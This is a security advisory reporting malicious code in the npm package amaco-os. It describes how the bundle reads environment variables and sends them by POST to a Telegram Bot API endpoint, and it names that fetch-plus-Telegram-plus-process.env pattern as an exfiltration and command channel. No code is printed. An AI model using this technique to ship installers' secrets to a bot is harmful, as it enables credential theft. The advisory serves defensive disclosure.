—

MAL-2026-4816

Malicious code in amaco-os (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (0a6204f29c39ab7a22921331bf33f2501b27fba9aac6a8b87b833caef9c5f506) dist/index.js contains a hardcoded Telegram Bot API endpoint (https://api.telegram.org) referenced from a fetch/POST call alongside process.env access. The pattern — fetch() + POST + api.telegram.org + process.env — is the canonical Telegram-bot exfiltration channel used to ship installer-side environment variables (and other host data) to an attacker-controlled bot/chat. Telegram's Bot API serves as a hardcoded C2: the attacker only needs the bot token embedded in the bundle to receive every installer's data. There is no legitimate reason for an OS-themed package's bundle to POST to the Telegram Bot API while reading process.env.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / amaco-os

No fixed version published yet for amaco-os (npm). Pin to a known-safe version or switch to an alternative.

References

https://www.npmjs.com/package/amaco-os/v/0.1.0 [PACKAGE]
https://www.npmjs.com/package/amaco-os/v/0.1.1 [PACKAGE]